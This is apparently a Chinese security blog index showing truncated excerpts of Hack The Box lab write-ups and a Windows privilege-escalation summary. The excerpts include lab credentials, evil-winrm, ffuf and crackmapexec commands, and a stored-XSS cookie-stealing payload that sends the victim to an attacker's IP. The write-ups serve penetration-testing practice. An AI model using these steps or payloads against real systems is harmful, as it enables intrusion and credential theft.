HTB-Dog HTB-Doggit泄露利用rustscan进行扫描 22和80端口开放。 访问80端口发现是一个 Backdrop CMS,扫一下后台,发现是一个git泄露。 利用Githack进行一波扫描,在settings.php中发现mysql的用户名和密码。 1mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop 通过信息收集,能发现它是一个1.2 2025-03-17 Linux靶机初级 #HTB
windows提权_2 windows提权_2对windows的一些常见的提权手法进行一个总结 windows 系统内核提权漏洞缓冲区溢出漏洞,通过修改内存中变量的值,可以劫持进程,执行恶意代码,最终获取到系统权限。 通过查看系统补丁,看当前系统哪些没有进行打补丁,就去寻找相关的漏洞。 windows不同系统提取的漏洞和补丁的相关信息 1.手动寻找补丁信息: 12systeminfowmic qfe get captio 2025-03-04 windows #提权
HTB-Titanic HTB-Titanic信息收集22 80端口开放 将域名和ip进行一个映射。然后扫后台,没扫出什么,尝试爆破子域名。 存在一个子域名,dev 添加进去。 dev的子域名是一个Gitea。然后接着扫后台,查看sitemap.xml 里面存放着另外一个子域名。 ** 这个gitea其实也就是titanic 之前扫到的后台还有这个信息,去访问看一下信息,里面存放着源码信息,以及一个数据库的密码。 这 2025-02-16 Linux靶机初级 #HTB
HTB-Return Return信息收集 访问80端口 是一个打印机。 这个地方可以利用ldap回传攻击 将ip改成自己的vpn的ip 然后端口不变,进行一个监听 得到密码 1edFg43012!! 漏洞利用上面的5985端口开启 可以试试winrm登录 1evil-winrm -i 10.10.11.108 -u "svc-printer" -p '1edFg43012!! 2025-02-11 Windows靶机初级 #HTB
HTB-Heal HTB-Heal信息收集扫描端口信息 22和80端口开放。 将域名和对应ip添加到/etc/hosts中 扫下后台 123/index.html/robots.txt/manifest.json 没什么有用的信息。 进行子域名爆破,看是否存在子域名。 1ffuf -w subdomains-top1million-110000.txt -u http://heal.htb/ -H &quo 2025-02-07 Linux靶机中级 #HTB
HTB-Backfire HTB-Backfire信息收集8000 22 443端口开启。 访问8000端口 发现有两个文件 漏洞利用下载下来看看 发现是一个Havoc 经过搜索得到一个SSRF的漏洞 参考链接:https://github.com/HimmeL-Byte/CVE-2024-41570-SSRF-RCE 尝试着打一下 发现可以 登录进去之后发现shell并不长久 我们可以通过ssh的公私钥对 进行一个 2025-02-02 Linux靶机中级 #HTB
HTB-cat HTB-cat信息收集 22 80端口开放 然后将cat.htb添加到/etc/hosts中 扫描后台 发现git泄露 将git泄露的代码拉下来审计 发现一个xss的 username和email未经过验证就被写进数据库中,这里能写入存储型的xss 获取cookie: 1<script>document.location='http://10.10.14.68:8888 2025-02-02 Linux靶机中级 #HTB
HTB-Trickster HTB-Tricksterlinux 中等难度 信息收集端口扫描发现22和80端口开放 访问80端口 发现并不能访问它的服务 做一下映射 将域名添加到/etc/hosts中。 第一个网站扫后台扫到了一个assets 没找到什么有用的信息 第二个网站是一个PrestaSHop 网上搜了大部分是sql注入漏洞 注册一个账户登录进去看看。 没啥东西,扫后台可以知道是一个git泄露 利用GitH 2025-01-25 Linux靶机中级 #HTB
HTB-Cicada HTB-Cicada信息收集 端口开放 445 利用smbclient查看一下共享资源。 在HR下 找到一个txt文件 下载下来。 漏洞利用在txt里面得到一个账户默认的密码,但是用户名并不知道,需要枚举。 1crackmapexec smb 10.10.11.35 -u "guest" -p " " --rid-brute | grep " 2025-01-17 Windows靶机初级 #HTB
ctfshow渗透赛复现 ctfshow渗透赛复现前置:我那时候只做到了第二章,第三章往后的都没做出来,主要是复现3到5章的内容,前两章的大概思路就是通过爆破,可以得到压缩包的密码,然后解一下RSA可以得到网址,账号密码的话,xxx.gxv 那个网站存在一个任意文件下载,通过wpscan api扫出来的 可以下载config.php得到初始的账号密码,然后登录进去,对jwt进行一个爆破,得到密钥,伪造身份,然后就是扫靶机的 2025-01-10 渗透比赛 #比赛复现